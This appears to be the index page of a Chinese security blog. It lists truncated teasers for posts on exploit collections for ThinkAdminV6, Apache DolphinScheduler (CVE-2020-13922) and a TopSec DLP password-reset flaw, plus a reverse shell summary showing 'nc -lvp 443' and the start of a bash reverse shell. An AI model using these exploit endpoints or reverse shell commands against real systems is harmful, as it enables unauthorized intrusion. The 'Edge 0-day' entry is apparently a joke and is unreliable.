一、ThinkAdminV6 任意文件操作 Update.php 三个函数未校验访问权限 目录遍历注意POST数据包rules参数值需要URL编码 POST /admin.html?s=admin/api.Update/…
HVV漏洞合集EXP2
1、Apache DolphinScheduler权限覆盖漏洞[CVE-2020-13922] 大概就长这个样子 POST /dolphinscheduler/users/update id=1&userName…
HVV漏洞合集EXP
1、天融信数据防泄漏系统越权修改管理员密码 无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。:默…
反弹shell的几种方式总结
假设本机地址10.10.10.11,监听端口443。 1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: bash -i >&…
Web源码泄露相关漏洞总结
总结了一些常见的web源码泄露漏洞,这些漏洞有的会泄露一些敏感的信息,会有意外的收获~
J2ExpSuite-漏洞利用框架(框)
一个以python3编写的的漏洞检测框架,可自定义,添加poc,exp 项目地址:https://github.com/JE2Se/J2ExpSuite 简单的写了一个框架,里面你的漏洞都没有集成,网络上有很多的poc,…
Cheetah-Nav-Team 猎豹导航源码
项目地址 https://github.com/JE2Se/Cheetah-Nav-Team 使用方法 python3 manage.py runserver 说明 本页面设计之初仅为设计一个导航页面,带后台的导航界面,…
微软EDGE-0Day
使用微软Edge访问如下链接 触发愚人节彩蛋~ https://www.je2se.com/poc.html